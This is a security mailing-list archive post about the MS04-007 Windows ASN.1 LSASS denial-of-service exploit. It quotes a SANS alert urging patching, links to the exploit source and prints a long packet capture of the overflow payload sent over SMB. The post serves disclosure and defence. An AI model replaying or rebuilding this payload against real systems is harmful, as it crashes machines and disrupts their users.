lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: alf1num3rik at yahoo.com (Stephen)
Subject: Re: Windows ASN.1 LSASS.EXE Remote Exploit (MS04-007)

--- Christophe Devine <devine@....cnam.fr> wrote:
> Stephen wrote:
> 
> >
>
http://www.k-otik.com/exploits/02.14.MS04-007-dos.c.php
> 

SANS institute issued an alert "MS04-007 Exploit
released" :

A DOS exploit has been made available using the ASN.1
bug (MS04-007). This exploit uses port 445, 139 or
135. While this is just a DOS exploit, more serious
exploits may follow soon. 
Note: This Exploit appears to work only against
Windows 2000 Professional. Dont forget history, it
wasnt long after Dcom came out, that we saw universal
shellcode for almost all windows platforms.

This may be your last chance to apply the patch!
(See yesterday's diary for more details regarding
ASN.1) 

The exploit kills lsass.exe (see definition below),
fires an error message to the screen, and reboots the
machine after approximately 1 minute. 

Lsass is:

Process File: lsass or lsass.exe 
Process Name: Local Security Authority Service 
Description: Windows Local Security Authority Server
Process handles Windows security mechanisms. It
verifies the validity of user logons to your computer
or server. Technically, the software generates the
process that is responsible for authenticating users
for the Winlogon service. 

Below are screen captures from the error log and lsass
crash message:

http://isc.sans.org/images/lsasspopup.gif 
http://isc.sans.org/images/errorlog.gif 

20:26:04.281879 192.168.1.13.1087 > 192.168.1.11.139:
tcp 1460 (DF) (ttl 128, id 438, len 1500)
0x0000   4500 05dc 01b6 4000 8006 6ffd c0a8 010d      
 E.....@...o.....
0x0010   c0a8 010b 043f 008b e01c 2816 ab83 5c57      
 .....?....(...\W
0x0020   5010 4413 cd30 0000 0000 0885 ff53 4d42      
 P.D..0.......SMB
0x0030   7300 0000 0008 01c8 0000 0000 0000 0000      
 s...............
0x0040   0000 0000 0000 7503 0000 0300 0cff 0000      
 ......u.........
0x0050   00ff ff02 0001 0000 0000 0033 0800 0000      
 ...........3....
0x0060   005c 0000 804a 0860 8208 2f06 062b 0601      
 .\...J.`../..+..
0x0070   0505 02a0 8208 2330 8208 1fa0 0e30 0c06      
 ......#0.....0..
0x0080   0a2b 0601 0401 8237 0202 0aa1 0523 0303      
 .+.....7.....#..
0x0090   0107 a282 0804 0482 0800 4e54 4c4d 5353      
 ..........NTLMSS
0x00a0   5000 0100 0000 1502 0860 0900 0900 2000      
 P........`......
0x00b0   0000 0700 0700 2900 0000 574f 524b 4752      
 ......)...WORKGR
0x00c0   4f55 5044 4546 4155 4c54 4141 4141 4141      
 OUPDEFAULTAAAAAA
0x00d0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x00e0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x00f0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0100   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0110   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0120   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0130   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0140   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0150   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0160   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0170   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0180   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0190   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x01a0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x01b0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x01c0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x01d0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x01e0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x01f0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0200   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0210   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0220   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0230   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0240   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0250   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0260   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0270   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0280   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0290   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x02a0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x02b0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x02c0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x02d0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x02e0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x02f0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0300   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0310   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0320   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0330   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0340   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0350   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0360   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0370   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0380   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0390   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
.....
Snip ... ending with this packet:
20:26:04.282134 192.168.1.13.1087 > 192.168.1.11.139:
tcp 725 (DF) (ttl 128, id 439, len 765)
0x0000   4500 02fd 01b7 4000 8006 72db c0a8 010d      
 E.....@...r.....
0x0010   c0a8 010b 043f 008b e01c 2dca ab83 5c57      
 .....?....-...\W
0x0020   5018 4413 4eef 0000 4141 4141 4141 4141      
 P.D.N...AAAAAAAA
0x0030   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0040   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0050   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0060   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0070   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0080   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0090   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x00a0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x00b0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x00c0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x00d0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x00e0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x00f0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0100   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0110   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0120   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0130   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0140   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0150   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0160   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0170   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0180   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0190   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x01a0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x01b0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x01c0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x01d0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x01e0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x01f0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0200   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0210   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0220   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0230   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0240   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0250   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0260   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0270   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0280   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x0290   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x02a0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x02b0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x02c0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x02d0   4141 4141 4141 4141 4141 4141 4141 4141      
 AAAAAAAAAAAAAAAA
0x02e0   4141 4141 4141 0055 006e 0069 0078 0000      
 AAAAAA.U.n.i.x..
0x02f0   0053 0061 006d 0062 0061 0000 00             
 .S.a.m.b.a...

from : http://isc.sans.org/diary.html

__________________________________
Do you Yahoo!?
Yahoo! Finance: Get your refund fast by filing online.
http://taxes.yahoo.com/filing.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ